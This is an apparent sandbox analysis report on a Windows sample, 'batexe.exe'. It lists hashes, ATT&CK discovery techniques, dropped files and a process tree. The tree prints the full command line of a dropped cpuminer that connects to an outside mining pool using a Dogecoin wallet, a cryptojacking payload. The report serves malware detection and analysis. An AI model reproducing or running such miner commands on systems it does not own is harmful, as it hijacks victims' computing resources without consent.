73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4040	b2e.exe
4252	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4252	cpuminer-sse2.exe
4252	cpuminer-sse2.exe
4252	cpuminer-sse2.exe
4252	cpuminer-sse2.exe
4252	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2804-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2804 wrote to memory of 4040	2804	batexe.exe	84
PID 2804 wrote to memory of 4040	2804	batexe.exe	84
PID 2804 wrote to memory of 4040	2804	batexe.exe	84
PID 4040 wrote to memory of 4752	4040	b2e.exe	85
PID 4040 wrote to memory of 4752	4040	b2e.exe	85
PID 4040 wrote to memory of 4752	4040	b2e.exe	85
PID 4752 wrote to memory of 4252	4752	cmd.exe	88
PID 4752 wrote to memory of 4252	4752	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2804
- C:\Users\Admin\AppData\Local\Temp\8C42.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8C42.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8C42.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\91E0.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8C42.tmp\b2e.exe

Filesize
600KB

MD5
3251a1ef5c130d350e5801c89d738749

SHA1
ffac88e1ce228a383e6bf5dbab5c6f9378d781c4

SHA256
501a81f3cedea330f099e630f9a987d37372804e1fba2141dd9952953683d468

SHA512
f0ad81ca7c92b40c9833dfa6bfe5ece0107d795f4dc42c1b64db98d0429a8293efeaae885afb941e13c548f79dec1d68554e2d7f985dfe589387f8250496b030

Download Submit
C:\Users\Admin\AppData\Local\Temp\8C42.tmp\b2e.exe

Filesize
570KB

MD5
13bddef52a2862c415b4c243c4584cc7

SHA1
cdb45c9e4f99a303f873535e27e5d23d06a34703

SHA256
6357e2a0547f3050e93368d3b25d7bc32e4b1b66083015f2ce2dd852df5f1380

SHA512
b7accef5a857121ef409412bd9fe4b0da3b1ada09ecae66cf73e8ce3766c5770508c4c5dd9519397cb352cafa5028bcb79fd9a56fbd86886f245774fe3fe522b

Download Submit
C:\Users\Admin\AppData\Local\Temp\8C42.tmp\b2e.exe

Filesize
731KB

MD5
b169b0ad258110b77e2ad1039d17ab29

SHA1
3255f8a29c98859b4c95362910c7f4114b567b84

SHA256
82705c83c18ad138a18532761a027839700f70d4a82a8fede54c4dbd8b6c7c27

SHA512
dd4d1e6cac01b2cffddfde2fb7c63350147826be62a156669e28a3093fe086e989f1aec527b5d352975e7787e5022543776e9564c38ef63e5d894d22caa56fbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\91E0.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
683KB

MD5
5e24b9b1c9e1b69f662cc9115f840acc

SHA1
1fb2cbad56afde371b313c5e8ea0efae301f6f4f

SHA256
7ddf8aa4583cca9d4f3a7667b045d92a4eba5dae95cff9c11c89c2b25cb25049

SHA512
94eec183dc664136495ae97994d3c441be3f0113b48f42539549403481fac9f74bdbfc1ce72c9c706af62ede7750ffb29a00c8b3ea81c20da0bdae3c5a9eac1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
272KB

MD5
ee648f07249da1c4c3d05cf0ede5d1af

SHA1
1c304d646eb37dadd2155661af41f7eafd0843e2

SHA256
5e850eba8406d2e6e95095e512945b17f610d18060ef89beb345853bc3f2cb25

SHA512
7682ba31c126d11f9316426951e363c0ed1ac8ef7ffe71e4574884e579b42c9d1ff26d1104b6c5f13744a588e686a9208e658d40b23e93543378182374624133

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
477KB

MD5
013d776d17afa499c86b72d4cae82784

SHA1
b31c2ab42cc5992a33e126e71d518df9abb9253e

SHA256
de4a9f74ac1bd8529079badbb4e4398cf2e40172e8b3ea7dfd81e070ebdcf7f1

SHA512
51ab8130f537431efc49f3293801a3e7f6db12158d6d3b464eb1eed3008285585a7284ce57bf4bb8c585b7699be2062f78a8f3185814a4f31548e5839da30ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
598KB

MD5
e0a30ebca682e437b459021f32dc7fb7

SHA1
b1bd2c65620fde2eb285067eaba9f1b5a9a7b453

SHA256
57eed298a783114d12d6037b0253bca3e1d3c120f9c3edee0cec6a225249d40d

SHA512
6fc3c46e4f72e4337b2c91d9b41cf4dc3a54531a9dd3e510bddd165cd5f5e792eb40816278a8f97701f410f8e0910aa5ce61d60de59d3e632ea01f06faa23cd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
457KB

MD5
591926abc7ceda2f154d6f74b7652cb2

SHA1
982cc8b9220c52ac7964ebff96d2135a72f90d3d

SHA256
25e9f6e319da3c13deef57cef33ebd736e2c415a8416f277113cc88bb7ba75cd

SHA512
f1c2c644945fa399c049ac9ca42bb99d47f8bd161cbb3ba2bc019c09e11efabc2541c2ce52fce33d23652b89edf185bf9e2e9cef2bfa3e90aae44fd2af985a96

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
286KB

MD5
e380fa5dff729dfea09b6ca3e147c587

SHA1
8bf9c71a933f5e41193591de4cf6c91b109f6ead

SHA256
5481fd67f212dbc94d5fdcbe990300d81b05d5467303c67371ae166cd6b6464f

SHA512
3c67036a588d838dcec4ce569c8239ce5faf47540e6cf3c87df6c2069a134592ce4862e5b20dffb6a7f8c134be6aa4a1337eeed2e71237c16464662f7aeac8ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
512KB

MD5
291c77b454ec88412af44da221a162dd

SHA1
0d4062090ef4bf6272b70fe7c8d473c73e77b84c

SHA256
adcff31c13b3da479d8c4905fd0cc492a72d7cabda1517ef06516bafb1cdbbe0

SHA512
22067bed530c39932117ffda0731510ce1f7d540043ee3871dd6bf24a30437534a1749c7778e0e7f155e3ba94e0b9c784b95e3d3afa5ca1a5d95ae4375922502

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
371KB

MD5
f03369e74505ada1ca61e0c1f4a51294

SHA1
03f7d90126dda282f2b416361fbf351707fd3712

SHA256
9c2eecaffb1615de9d5ec061da95e52af83600bbbb42e00339d9d419a6219d69

SHA512
44aab7acace13636049a587e022376222bfb334313b1aeb1684148b956c443dae248e52fd5a94d8a172d5b24fbc5ab086977e3e42c9d37ab14df7031ba2b130d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
604KB

MD5
5c2c9db6d0616bde56bfefa7a9bb57eb

SHA1
b35c3f1e372de11c951fea6895810a34aeca3dfe

SHA256
2058308527edb2446ac923d0df780e893ecb8f3bc03c1a5e3fb14ce0b5962da2

SHA512
ef36d461979ad1833ad7843d5cd6ba0a2b960ca9be84dde27c9f13d8ee50057d4e98740856d14873e9704f20ec9b35c732d4d4cbfdbc3f3aa4c3de14a5768e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
362KB

MD5
748d305ecc7c556e34bd4160e2173cc2

SHA1
be6e2c6c7ddbc85a6d86717bab83cf79625ab720

SHA256
b0d270a6a992b10dcdbd5ca1c8e8f7f7706671292e32452438f61730bc58b963

SHA512
13e0dc4dea6de9e280eda43ce9fd8e13ece570a4f69bba4b5d853c5ae8d48a32552e914b7788167160e8388bd718219a0217b6b0eb6122ff29e76467267e6dc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2804-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4040-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4040-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4252-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4252-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4252-47-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/4252-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-46-0x0000000073260000-0x00000000732F8000-memory.dmp

Filesize
608KB

Download
memory/4252-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4252-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download